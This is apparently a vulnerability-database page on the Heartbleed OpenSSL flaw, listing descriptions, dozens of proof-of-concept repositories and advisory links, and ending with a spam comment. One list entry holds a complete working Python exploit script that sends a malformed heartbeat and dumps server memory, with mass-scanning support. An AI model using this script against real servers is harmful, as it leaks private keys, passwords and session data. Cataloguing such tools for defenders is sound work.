CVE-2014-0160: CVE-2014-0160

Get alerts for future matching vulnerabilitiesLog in to subscribe

I. Basic Information for CVE-2014-0160

Vulnerability Information

Have questions about the vulnerability? See if Shenlong's analysis helps!

Although we use advanced large model technology, its output may still contain inaccurate or outdated information.Shenlong tries to ensure data accuracy, but please verify and judge based on the actual situation.

Vulnerability Title

N/A

Source: NVD (National Vulnerability Database)

Vulnerability Description

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

Source: NVD (National Vulnerability Database)

CVSS Information

N/A

Source: NVD (National Vulnerability Database)

Vulnerability Type

N/A

Source: NVD (National Vulnerability Database)

Vulnerability Title

OpenSSL 缓冲区错误漏洞

Source: CNNVD (China National Vulnerability Database)

Vulnerability Description

OpenSSL是OpenSSL团队开发的一个开源的能够实现安全套接层（SSL v2/v3）和安全传输层（TLS v1）协议的通用加密库，它支持多种加密算法，包括对称密码、哈希算法、安全散列算法等。 OpenSSL的TLS和DTLS实现过程中的d1_both.c和t1_lib.c文件中存在安全漏洞，该漏洞源于当处理Heartbeat Extension数据包时，缺少边界检查。远程攻击者可借助特制的数据包利用该漏洞读取服务器内存中的敏感信息(如用户名、密码、Cookie、私钥等)。以下版本的OpenSSL受到

Source: CNNVD (China National Vulnerability Database)

CVSS Information

N/A

Source: CNNVD (China National Vulnerability Database)

Vulnerability Type

N/A

Source: CNNVD (China National Vulnerability Database)

Affected Products

Vendor	Product	Affected Versions	CPE	Subscribe
-	n/a	n/a	-

II. Public POCs for CVE-2014-0160

#	POC Description	Source Link	Shenlong Link
1	A checker (site and tool) for CVE-2014-0160	https://github.com/FiloSottile/Heartbleed	POC Details
2	OpenSSL CVE-2014-0160 Heartbleed vulnerability test	https://github.com/titanous/heartbleeder	POC Details
3	bleed is a tool to test servers for the 'Heartbleed' vulnerability (CVE-2014-0160).	https://github.com/DominikTo/bleed	POC Details
4	Mass, multithreaded testing for servers against Heartbleed (CVE-2014-0160).	https://github.com/cyphar/heartthreader	POC Details
5	Patch openssl #heartbleed with ansible	https://github.com/jdauphant/patch-openssl-CVE-2014-0160	POC Details
6	Multi-threaded tool for scanning many hosts for CVE-2014-0160.	https://github.com/musalbas/heartbleed-masstest	POC Details
7	None	https://github.com/obayesshelton/CVE-2014-0160-Scanner	POC Details
8	Heartbleed (CVE-2014-0160) client exploit	https://github.com/Lekensteyn/pacemaker	POC Details
9	OpenSSL TLS heartbeat read overrun (CVE-2014-0160)	https://github.com/isgroup/openmagic	POC Details
10	openssl Heart Bleed Exploit: CVE-2014-0160 Mass Security Auditor	https://github.com/fb1h2s/CVE-2014-0160	POC Details
11	Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160	https://github.com/takeshixx/ssl-heartbleed.nse	POC Details
12	Chrome extension that automatically checks visited sites for vulnerability to OpenSSL CVE-2014-0160	https://github.com/roganartu/heartbleedchecker-chrome	POC Details
13	Checks for vulnerabilities: CVE-2014-0160	https://github.com/zouguangxian/heartbleed	POC Details
14	Test for SSL heartbeat vulnerability (CVE-2014-0160)	https://github.com/sensepost/heartbleed-poc	POC Details
15	A firefox extension and checker for CVE-2014-0160	https://github.com/proactiveRISK/heartbleed-extention	POC Details
16	Test CIDR blocks for CVE-2014-0160/Heartbleed	https://github.com/amerine/coronary	POC Details
17	Heartbleed variants	https://github.com/0x90/CVE-2014-0160	POC Details
18	None	https://github.com/ice-security88/CVE-2014-0160	POC Details
19	This repo contains a script to automatically test sites for vulnerability to the Heartbleed Bug (CVE-2014-0160) based on the input file for the urls.	https://github.com/waqasjamal-zz/HeartBleed-Vulnerability-Checker	POC Details
20	CVE-2014-0160 mass test against subdomains	https://github.com/siddolo/knockbleed	POC Details
21	OpenSSL Heartbleed (CVE-2014-0160) Fix script	https://github.com/sammyfung/openssl-heartbleed-fix	POC Details
22	CVE-2014-0160 scanner	https://github.com/a0726h77/heartbleed-test	POC Details
23	POC for CVE-2014-0160 (Heartbleed) for DTLS	https://github.com/hreese/heartbleed-dtls	POC Details
24	Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160	https://github.com/wwwiretap/bleeding_onions	POC Details
25	Test script for test 1Password database for SSL Hea(r)t Bleeding (CVE-2014-0160)	https://github.com/idkqh7/heatbleeding	POC Details
26	Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160.	https://github.com/GeeksXtreme/ssl-heartbleed.nse	POC Details
27	A research tool designed to check for OpenSSL CVE-2014-0160 vulnerability	https://github.com/xlucas/heartbleed	POC Details
28	A checker (site and tool) for CVE-2014-0160:	https://github.com/indiw0rm/-Heartbleed-	POC Details
29	OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.	https://github.com/einaros/heartbleed-tools	POC Details
30	A checker (site and tool) for CVE-2014-0160	https://github.com/mozilla-services/Heartbleed	POC Details
31	openssl Heartbleed bug(CVE-2014-0160) check for Node.js	https://github.com/yryz/heartbleed.js	POC Details
32	Maltego transform to detect the OpenSSL Heartbleed vulnerability (CVE-2014-0160)	https://github.com/DisK0nn3cT/MaltegoHeartbleed	POC Details
33	CVE-2014-0160 (Heartbeat Buffer over-read bug)	https://github.com/OffensivePython/HeartLeak	POC Details
34	Heartbleed (CVE-2014-0160) SSLv3 Scanner	https://github.com/vortextube/ssl_scanner	POC Details
35	:broken_heart: Hearbleed exploit to retrieve sensitive information CVE-2014-0160 :broken_heart:	https://github.com/mpgn/heartbleed-PoC	POC Details
36	#!/usr/bin/python # Modified by Travis Lee # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to specify TLS version # -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc... # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) # -added option to have verbose output # -added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)') options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)') options.add_option('-s', '--starttls', action="store_true", dest="starttls", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...') options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port') options.add_option('-v', '--verbose', action="store_true", dest="verbose", help='Enable verbose output') opts, args = options.parse_args() def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') # set TLS version if opts.tls == 0: hb = h2bin('''18 03 01 00 03 01 40 00''') elif opts.tls == 1: hb = h2bin('''18 03 02 00 03 01 40 00''') elif opts.tls == 2: hb = h2bin('''18 03 03 00 03 01 40 00''') else: hb = h2bin('''18 03 02 00 03 01 40 00''') def hexdump(s): pdat = '' for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] #hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin) #print ' %04x: %-48s %s' % (b, hxdat, pdat) pdat = re.sub(r'([.]{50,})', '', pdat) return pdat def recvall(s, length, timeout=5): try: endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata except: print "Error receiving data: ", sys.exc_info()[0] def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None if opts.verbose: print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, targ): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return '' if typ == 24: if opts.verbose: print 'Received heartbeat response...' #hexdump(pay) if len(pay) > 3: print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return hexdump(pay) if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return '' def bleed(targ, port): try: res = '' print print '##################################################################' print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls) for x in range(0, opts.num): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() s.settimeout(10) s.connect((targ, port)) # send starttls command if specified as an option or if common smtp/pop3/imap ports are used if (opts.starttls) or (port in {25, 587, 110, 143, 21}): stls = False atls = False # check if smtp supports starttls/stls if port in {25, 587}: print 'SMTP Port... Checking for STARTTLS Capability...' check = s.recv(1024) s.send("EHLO someone.org\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if pop3/imap supports starttls/stls elif port in {110, 143}: print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...' check = s.recv(1024) if port == 110: s.send("CAPA\n") if port == 143: s.send("CAPABILITY\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if ftp supports auth tls/starttls elif port in {21}: print 'FTP Port... Checking for AUTH TLS Capability...' check = s.recv(1024) s.send("FEAT\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "AUTH TLS" in check: opts.starttls = True atls = True print "AUTH TLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # send appropriate tls command if supported if opts.starttls: sys.stdout.flush() if stls: print 'Sending STLS Command...' s.send("STLS\n") elif atls: print 'Sending AUTH TLS Command...' s.send("AUTH TLS\n") else: print 'Sending STARTTLS Command...' s.send("STARTTLS\n") if opts.verbose: print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if opts.verbose: print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' print '##################################################################' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) res += hit_hb(s, targ) s.close() print '##################################################################' print return res except: print "Error connecting to host: ", sys.exc_info()[0] print '##################################################################' print def main(): allresults = '' # if a file is specified, loop through file if opts.filein: fileIN = open(opts.filein, "r") for line in fileIN: targetinfo = line.strip().split(":") if len(targetinfo) > 1: allresults = bleed(targetinfo[0], int(targetinfo[1])) else: allresults = bleed(targetinfo[0], opts.port) if allresults: print '%s' % (allresults) fileIN.close() else: if len(args) < 1: options.print_help() return allresults = bleed(args[0], opts.port) if allresults: print '%s' % (allresults) print if __name__ == '__main__': main()	https://github.com/xanas/heartbleed.py	POC Details
37	A checker (site and tool) for CVE-2014-0160. Software from @FiloSottile for iSC Inc..	https://github.com/iSCInc/heartbleed	POC Details
38	None	https://github.com/marstornado/cve-2014-0160-Yunfeng-Jiang	POC Details
39	Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed	https://github.com/hmlio/vaas-cve-2014-0160	POC Details
40	Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)	https://github.com/hybridus/heartbleedscanner	POC Details
41	Dockerfile for testing CVE-2014-0160 Heartbleed exploitation.	https://github.com/froyo75/Heartbleed_Dockerfile_with_Nginx	POC Details
42	Heartbleed	https://github.com/Xyl2k/CVE-2014-0160-Chrome-Plugin	POC Details
43	来自：https://www.freebuf.com/articles/web/31700.html	https://github.com/caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC	POC Details
44	CVE-2014-0160	https://github.com/Saymeis/HeartBleed	POC Details
45	cve-2014-0160	https://github.com/cved-sources/cve-2014-0160	POC Details
46	Demonstration of the Heartbleed Bug CVE-2014-0160	https://github.com/cheese-hub/heartbleed	POC Details
47	None	https://github.com/artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS	POC Details
48	Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔	https://github.com/cldme/heartbleed-bug	POC Details
49	Aquí está mi nuevo y primer exploit web, este exploit ataca a la vulnerabilidad de HeartBleed (CVE-2014-0160) espero que os guste.	https://github.com/ThanHuuTuan/Heartexploit	POC Details
50	Simple OpenSSL TLS Heartbeat (CVE-2014-0160) Scanner and Exploit (Multiple SSL/TLS versions)	https://github.com/rouze-d/heartbleed	POC Details
51	None	https://github.com/WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed	POC Details
52	CVE-2014-0160 OpenSSL Heartbleed Proof of Concept	https://github.com/GuillermoEscobero/heartbleed	POC Details
53	A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https://github.com/hahwul/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device	https://github.com/clino-mania/A2SV--SSL-VUL-Scan	POC Details
54	OpenSSL Heartbleed Bug CVE-2014-0160 Toolkit. Built with ❤ by Christopher Ngo.	https://github.com/ingochris/heartpatch.us	POC Details
55	A collection of scripts and instructions to test CVE-2014-0160 (heartbleed). ❤️ 🩸	https://github.com/BelminD/heartbleed	POC Details
56	The Heartbleed bug `CVE-2014-0160` is a severe implementation flaw in the OpenSSL library, which enables attackers to steal data from the memory of the victim server. The contents of the stolen data depend on what is there in the memory of the server. It could potentially contain private keys, TLS session keys, usernames, passwords, credit cards, etc. The vulnerability is in the implementation of the Heartbeat protocol, which is used by SSL/TLS to keep the connection alive.	https://github.com/pierceoneill/bleeding-heart	POC Details
57	None	https://github.com/crypticdante/CVE-2014-0160_Heartbleed	POC Details
58	fuzzing with libFuzzer，inlude openssl heartbleed (CVE-2014-0160)	https://github.com/GardeniaWhite/fuzzing	POC Details
59	Proof of concept for exploiting the Heartbeat Extension bug detailed in the CVE-2014-0160. :old_key: :unlock:	https://github.com/undacmic/heartbleed-proof-of-concept	POC Details
60	Check for CVE-2014-0160	https://github.com/cbk914/heartbleed-checker	POC Details
61	None	https://github.com/MrE-Fog/CVE-2014-0160-Chrome-Plugin	POC Details
62	None	https://github.com/timsonner/cve-2014-0160-heartbleed	POC Details
63	None	https://github.com/H3xL00m/CVE-2014-0160_Heartbleed	POC Details
64	None	https://github.com/n3ov4n1sh/CVE-2014-0160_Heartbleed	POC Details
65	None	https://github.com/c0d3cr4f73r/CVE-2014-0160_Heartbleed	POC Details
66	OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner.	https://github.com/pblittle/aws-suture	POC Details
67	None	https://github.com/Sp3c73rSh4d0w/CVE-2014-0160_Heartbleed	POC Details
68	None	https://github.com/0xwh1pl4sh/CVE-2014-0160_Heartbleed	POC Details
69	None	https://github.com/N3rdyN3xus/CVE-2014-0160_Heartbleed	POC Details
70	None	https://github.com/Yash-Thakkar77/CVE-2014-0160-HeartBleed	POC Details
71	None	https://github.com/NyxByt3/CVE-2014-0160_Heartbleed	POC Details
72	A collection of scripts and instructions to test CVE-2014-0160 (heartbleed). ❤️ 🩸	https://github.com/belmind/heartbleed	POC Details
73	None	https://github.com/h3xcr4ck3r/CVE-2014-0160_Heartbleed	POC Details
74	None	https://github.com/n3rdh4x0r/CVE-2014-0160_Heartbleed	POC Details
75	None	https://github.com/yashfren/CVE-2014-0160-HeartBleed	POC Details
76	The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users, and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users.	https://github.com/projectdiscovery/nuclei-templates/blob/main/code/cves/2014/CVE-2014-0160.yaml	POC Details
77	None	https://github.com/Threekiii/Awesome-POC/blob/master/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E/OpenSSL%20%E5%BF%83%E8%84%8F%E6%BB%B4%E8%A1%80%E6%BC%8F%E6%B4%9E%20CVE-2014-0160.md	POC Details
78	None	https://github.com/Threekiii/Awesome-POC/blob/master/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E/OpenSSL%20%E5%BF%83%E8%84%8F%E5%87%BA%E8%A1%80%E6%BC%8F%E6%B4%9E%20CVE-2014-0160.md	POC Details
79		https://github.com/vulhub/vulhub/blob/master/openssl/CVE-2014-0160/README.md	POC Details
80	None	https://github.com/h3x0v3rl0rd/CVE-2014-0160_Heartbleed	POC Details
81	This is the Heratbleed bug (CVE-2014-0160) documentation I did for Advenced Cyber Attacks course.	https://github.com/Shayhha/HeartbleedAttack	POC Details
82	The objective of this project was to assess a remote host for the Heartbleed vulnerability (CVE-2014-0160), verify its presence, and exploit it to extract potentially sensitive information from server memory over the TLS protocol.	https://github.com/ArtemCyberLab/Project-Field-Analysis-and-Memory-Leak-Demonstration	POC Details
83	Proof of concept for CVE-2014-0160 (OpenSSL 1.0.1 - Heartbleed)	https://github.com/0x00-V/heartbleed-poc	POC Details
84	Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔	https://github.com/tomdevman/heartbleed-bug	POC Details
85	Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160	https://github.com/0xinf0/bleeding_onions	POC Details
86	This Python PoC script detects the Heartbleed vulnerability (CVE-2014-0160) by performing a TLS handshake with heartbeat extension and sending a crafted heartbeat request. It parses responses to identify leaked memory, helping assess server susceptibility to this critical OpenSSL flaw.	https://github.com/indrajeetmp11/Heartbleed-PoC-Exploit-Script	POC Details
87	Heartbleed (CVE-2014-0160) was devastating because it leaked adjacent memory. CTT-Heartbleed goes further—it uses 33-layer temporal resonance to map, reconstruct, and extract specific memory regions across time, not just adjacent buffers.	https://github.com/SimoesCTT/CTT-HEARTBLEED-Temporal-Resonance-Memory-Leak-Exploit-Heartbleed-CVE-2014-0160	POC Details
88	None	https://github.com/22imer/CVE-2014-0160	POC Details

AI-Generated POCPremium

No public POC found.

III. Intelligence Information for CVE-2014-0160

Please Login to view more intelligence information

http://www.getchef.com/blog/2014/04/09/chef-server-11-0-12-release/
http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf
http://www-01.ibm.com/support/docview.wss?uid=isg400001841
http://www.blackberry.com/btsc/KB35882
http://www.getchef.com/blog/2014/04/09/chef-server-heartbleed-cve-2014-0160-releases/
http://advisories.mageia.org/MGASA-2014-0165.html
http://www.kerio.com/support/kerio-control/release-history
http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/
https://www.cert.fi/en/reports/2014/vulnerability788210.html
https://cert-portal.siemens.com/productcert/pdf/ssa-635659.pdf
http://cogentdatahub.com/ReleaseNotes.html
http://support.citrix.com/article/CTX140605
https://blog.torproject.org/blog/openssl-bug-cve-2014-0160
https://code.google.com/p/mod-spdy/issues/detail?id=85
http://www.openssl.org/news/secadv_20140407.txt
http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=1
http://www.splunk.com/view/SP-CAAAMB3
http://www.innominate.com/data/downloads/manuals/mdm_1.5.2.1_Release_Notes.pdf
http://heartbleed.com/
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00
https://gist.github.com/chapmajs/10473815
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004661
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0
https://bugzilla.redhat.com/show_bug.cgi?id=1084875
https://sku11army.blogspot.com/2020/01/heartbleed-hearts-continue-to-bleed.html
https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217
https://filezilla-project.org/versions.php?type=server
https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-17-0008
http://www.getchef.com/blog/2014/04/09/enterprise-chef-1-4-9-release/
http://www-01.ibm.com/support/docview.wss?uid=swg21670161
http://www.getchef.com/blog/2014/04/09/enterprise-chef-11-1-3-release/
http://www.vmware.com/security/advisories/VMSA-2014-0012.html
http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html
http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=3
http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html
http://www.exploit-db.com/exploits/32745exploit
http://secunia.com/advisories/59243third-party-advisory
http://secunia.com/advisories/57966third-party-advisory
http://secunia.com/advisories/59139third-party-advisory
http://secunia.com/advisories/59347third-party-advisory
http://secunia.com/advisories/57347third-party-advisory
http://secunia.com/advisories/57483third-party-advisory
http://secunia.com/advisories/57836third-party-advisory
http://www.securityfocus.com/bid/66690vdb-entry
http://secunia.com/advisories/57721third-party-advisory
http://secunia.com/advisories/57968third-party-advisory
http://www.exploit-db.com/exploits/32764exploit
http://www.securitytracker.com/id/1030078vdb-entry
http://www.securitytracker.com/id/1030082vdb-entry
http://www.securitytracker.com/id/1030081vdb-entry
http://www.securitytracker.com/id/1030080vdb-entry
http://www.securitytracker.com/id/1030026vdb-entry
http://www.securitytracker.com/id/1030074vdb-entry
http://www.securitytracker.com/id/1030079vdb-entry
http://www.securitytracker.com/id/1030077vdb-entry
http://www.debian.org/security/2014/dsa-2896vendor-advisory
http://www.us-cert.gov/ncas/alerts/TA14-098Athird-party-advisory
http://www.kb.cert.org/vuls/id/720951third-party-advisory
http://www.ubuntu.com/usn/USN-2165-1vendor-advisory
http://marc.info/?l=bugtraq&m=142660345230545&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139824993005633&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139843768401936&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=140015787404650&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139808058921905&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139757726426985&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139757819327350&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139869720529462&w=2vendor-advisory
https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?spf_p.tpst=kbDocDisplay&spf_p.prp_kbDocDisplay=wsrp-navigationalState%3DdocId%253Demr_na-c04260637-4%257CdocLocale%253Den_US%257CcalledBy%253DSearch_Result&javax.portlet.begCavendor-advisory
http://marc.info/?l=bugtraq&m=139836085512508&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139757919027752&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139774703817488&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905295427946&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139833395230364&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139842151128341&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905868529690&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139817685517037&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905351928096&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=140724451518351&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905653828999&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139758572430452&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139869891830365&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=140075368411126&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905243827825&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139722163017074&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139889113431619&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139765756720506&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139835844111589&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139774054614965&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905202427693&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905458328378&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=141287864628122&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139817782017443&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139889295732144&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139817727317190&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139824923705461&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139835815211508&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=140752315422991&w=2vendor-advisory
http://rhn.redhat.com/errata/RHSA-2014-0396.htmlvendor-advisory
http://www.mandriva.com/security/advisories?name=MDVSA-2015:062vendor-advisory
http://rhn.redhat.com/errata/RHSA-2014-0378.htmlvendor-advisory
http://rhn.redhat.com/errata/RHSA-2014-0376.htmlvendor-advisory
http://rhn.redhat.com/errata/RHSA-2014-0377.htmlvendor-advisory
http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.htmlvendor-advisory
http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.htmlvendor-advisory
http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136473.htmlvendor-advisory
http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131221.htmlvendor-advisory
http://lists.opensuse.org/opensuse-updates/2014-04/msg00061.htmlvendor-advisory
http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.htmlvendor-advisory
http://seclists.org/fulldisclosure/2014/Apr/90mailing-list
http://seclists.org/fulldisclosure/2014/Apr/109mailing-list
http://seclists.org/fulldisclosure/2014/Apr/190mailing-list
http://seclists.org/fulldisclosure/2014/Apr/91mailing-list
http://seclists.org/fulldisclosure/2014/Apr/173mailing-list
https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220%40%3Cdev.tomcat.apache.org%3Emailing-list
https://lists.apache.org/thread.html/rf8e8c091182b45daa50d3557cad9b10bb4198e3f08cf8f1c66a1b08d%40%3Cdev.tomcat.apache.org%3Emailing-list
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleedvendor-advisory
https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-April/000184.htmlmailing-list
http://seclists.org/fulldisclosure/2014/Dec/23mailing-list
http://www.securityfocus.com/archive/1/534161/100/0/threadedmailing-list
https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2%40%3Cdev.tomcat.apache.org%3Emailing-list
https://nvd.nist.gov/vuln/detail/CVE-2014-0160

IV. Related Vulnerabilities

Same product: n/a

Same vendor: n/a

V. Comments for CVE-2014-0160

Anonymous User

2026-04-25 13:12:22

Hello pals! I came across a 169 valuable website that I think you should visit. This platform is packed with a lot of useful information that you might find valuable. It has everything you could possibly need, so be sure to give it a visit! <a href=https://practicesource.com/the-most-profitable-lines-of-business/>https://practicesource.com/the-most-profitable-lines-of-business/</a> And do not neglect, guys, that you always may in the publication discover solutions to address the most the very confusing questions. We tried to explain all of the data using the most most understandable method.

Goal Reached Thanks to every supporter — we hit 100%!

I. Basic Information for CVE-2014-0160

Vulnerability Information

Vulnerability Title

Vulnerability Description

CVSS Information

Vulnerability Type

Vulnerability Title

Vulnerability Description

